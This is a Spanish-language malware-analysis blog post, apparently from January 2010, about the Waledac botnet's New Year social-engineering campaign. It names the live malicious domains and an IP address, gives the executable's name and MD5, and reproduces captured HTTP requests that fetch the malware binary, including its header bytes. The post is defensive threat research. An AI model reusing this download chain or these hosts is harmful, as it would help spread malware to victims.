La presente línea de tiempo abarca desde las primeras actividades de Ingeniería Social hasta la última y recientemente conocida, relacionda al inicio del 2010.


Información relacionada
Waledac vuelve con otra estrategia de ataque
Waledac/Storm. Pasado y presente de una amenaza latente
Masiva campaña de propagación/infección lanzada por Waledac utilizando como excusa el día de la Independencia de EEUU
Estrategia BlackHat SEO propuesta por Waledac
Waledac. Seguimiento detallado de una amenaza latente
Más Waledac en acción ¿Puedes adivinar cuánto te amo gano?
Waledac más amoroso que nunca
Waledac e Ingeniería Social en San Valentín

Jorge Mieres

Ver más

1.1.10

Waledac vuelve con otra estrategia de ataque

Luego de un largo periodo de inactividad, la botnet formada por waledac vuelve a desplegar una estrategia de infección utilizando el patrón que lo caracteriza: Ingeniería Social, que en esta oportunidad aprovecha como cobertura el comienzo del nuevo año.

Las últimas campañas de waledac datan de mediados de año cuando la estrategia de propagación utilizada simulaba ser un video sobre el día de la independencia en EE.UU, alojado en YouTube. De hecho, la actividad más importante durante este año se produjo durante el primer cuatrimestre.

A continuación podemos observar capturas que describen la línea de tiempo de waledac en torno a su actividad durante el 2009.

Sin embargo, quienes se encuentran detrás de waledac nunca se detuvieron y los dominios utilizados recientemente poseen fecha de registro durante todo el periodo de supuesta inactividad.

Cada página utilizada para la propagación posee un script ofuscado con instrucciones para ser ejecutadas de forma automática en el equipo víctima. De esta manera, se explota una debilidad y automáticamente se descarga y ejecuta el malware, convirtiendo el equipo en un nodo más de la botnet, para continuar con sus actividades fraudulentas. A continuación vemos una captura del script.

Dentro del script se encuentra la referencia hacia el archivo counter.php que aloja otro script y desde el cual salta hacia http://diokxbgrqkgg.com/ld/trest1/ y este a http://diokxbgrqkgg.com/nte/trest1.py, en donde se encuentra otro script malicioso.

GET /counter.php HTTP/1.1
Host: aju.nonprobs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://aju.nonprobs.com/2010.html


En esta instancia, descarga y ejecuta un archivo llamado "ny_foroplay.exe" (MD5: df2d6f835ad6e5276b1b1ffe73170070) desde la dirección IP 95.169.190.208 alojada en Rusia.

Cabe aclarar que este malware posee un muy bajo índice de detección, siendo detectado hasta el momento sólo por 6 compañías antivirus de un total de 40. Reporte de VT.

GET /pr/pic/ny_foroplay.exe HTTP/1.0
Host: 95.169.190.208

HTTP/1.0 200 OK
Age: 1542
Date: Fri, 01 Jan 2010 19:22:58 GMT
Content-Length: 416256
Content-Type: application/octet-stream
Server: nginx/0.8.15
Last-Modified: Fri, 01 Jan 2010 19:22:58 GMT

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$.........y.=u..=u..=u...u..u..

Waledac ha vuelto con una nueva excusa, aunque a juzgar por el porcentaje de actividad que posee el servidor donde se encuentra alojado, todo indica que siempre se mantuvo latente con actividades muy esporádicas. Incluso, teniendo en cuenta la estructura de carpetas desde la cual se descarga, parecería haber una relación directa con otra amenaza bastante conocido que es Bredolab, y a la cual aparentemente también asocian con algunos scareware y ZeuS.

Información relacionada
Waledac/Storm. Pasado y presente de una amenaza latente
Masiva campaña de propagación/infección lanzada por Waledac utilizando como excusa el día de la Independencia de EEUU
Estrategia BlackHat SEO propuesta por Waledac
Waledac. Seguimiento detallado de una amenaza latente
Más Waledac en acción ¿Puedes adivinar cuánto te amo gano?
Waledac más amoroso que nunca
Waledac e Ingeniería Social en San Valentín

Jorge Mieres

Ver más